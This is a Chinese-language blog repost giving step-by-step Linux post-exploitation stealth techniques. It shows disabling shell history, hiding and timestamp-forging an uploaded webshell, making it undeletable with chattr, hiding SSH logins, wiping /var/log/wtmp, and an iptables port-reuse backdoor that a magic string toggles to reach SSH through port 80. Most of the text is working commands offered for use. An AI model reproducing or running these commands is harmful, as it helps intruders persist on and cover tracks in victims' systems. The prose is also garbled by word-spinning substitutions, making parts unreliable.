#禁用历史记录功能[space]set +o history备注:[space] 表示空格。并且由于空格的缘故,该命令本身也不会被记录#重新开启历史记录功能[space]set -o history#删除详细的某个记录history -d 数组
上面的命令会临时禁用历史功能,这意味着在这命令之后你实行的所有操作都不会记录到历史记录中
隐蔽文件/文件夹1. 创建隐蔽文件或者文件夹
touch .123.txtmkdir .a#文件名/夹前面加一个 点 就代表是隐蔽文件/夹

linux下藏后门必须要修正韶光,否则很随意马虎被创造,直策应用 touch 就可以了。假设我们上传了一个隐蔽后门.webshell.php
1. 上传后门
明显看到.webshell.php韶光戳不一样,ls-al,查看到的韶光为文件修正的韶光
我们还可以利用stat命令来查看文件详细的韶光戳
stat 文件名
在Linux中,没有文件创建韶光的观点。只有文件的访问韶光、修正韶光、状态改变韶光。也便是说不能知道文件的创建韶光。但如果文件创建后就没有修正过,修正韶光=创建韶光
stat查看韶光戳有三种韶光属性
2. 修正韶光戳
直策应用 touch 就可以,比如参考 index.php 的韶光,再赋给 .webshell.php,结果两个文件的韶光就一样了
touch -r index.html .webshell.php
连接webshell,可见隐蔽文件也可以进行连接的。
隐蔽权限
在Linux中,利用chattr命令来防止root和其他管理用户误删除和修正主要文件及目录,此权限用ls -l是查看不出来的,从而达到隐蔽权限的目的。
这个技巧常被用在后门,变成了一些难以打消的后门文件。
chattr +i .webshell.php 锁定文件,此时无法查看lsattr .webshell.php 属性查看chattr -i .webshell.php 解除锁定rm -rf .webshell.php 删除文件
在linux中可以利用last查看账号ssh登录情形
last|grep root
当我们用ssh进行登录时,就会记录,信息包括登录的账号,远程登录的主机,登录韶光
ssh加上-T参数,可以进行隐蔽登录记录,不被w、who、last等指令检测到
ssh -T -i id_rsa root@192.168.110.131 /bin/bash -i
打消last记录
echo “”>/var/log/wtmp
此时即看不到用户登录信息
端口复用
端口复用是指不同的运用程序利用相同端口进行通讯。我们可以通过端口复用来达到隐蔽端口的目的。其他浸染还有很多,如内网渗透中,搭建隧道时,做事器仅许可指定的端口对外开放。利用端口复用可以将3389或22等端口转发到如80端口上,以便外部连接。
1. 利用IPTables进行端口复用
假设主机开放的web做事是80端口,在被拿下的主机上实行如下命令
# 创建端口复用链iptables -t nat -N LETMEIN# 创建端口复用规则,将流量转发至 22 端口iptables -t nat -A LETMEIN -p tcp -j REDIRECT --to-port 22#开启开关,如果吸收到一个含有 threathuntercoming 的 TCP 包,则将来源 IP 添加到加为 letmein 的列表中iptables -A INPUT -p tcp -m string --string 'threathuntercoming' --algo bm -m recent --set --name letmein --rsource -j ACCEPT#关闭开关,如果吸收到一个含有 threathunterleaving 的 TCP 包,则将来源 IP 从 letmein 的列表中移除iptables -A INPUT -p tcp -m string --string 'threathunterleaving' --algo bm -m recent --name letmein --remove -j ACCEPT# let's do it,如果创造 SYN 包的来源 IP 处于 letmein 列表中,将跳转到 LETMEIN 链进行处理,有效韶光为 3600 秒iptables -t nat -A PREROUTING -p tcp --dport 80 --syn -m recent --rcheck --seconds 3600 --name letmein --rsource -j LETMEIN
攻击者的linux系统上实行如下
#开启复用echo threathuntercoming | socat - tcp:192.168.110.131:80#ssh利用80端口进行登录ssh -p 80 root@192.168.110.131 -T /bin/bash -i#关闭复用,此时不能用80端口进行ssh连接echo threathunterleaving | socat - tcp:192.168.110.131:80
连接目标80端口成功连接ssh
ps:进行端口复用后同时也可以用默认的22端口进行ssh连接
原文链接:https://blog.csdn.net/qq_44159028/article/details/124196458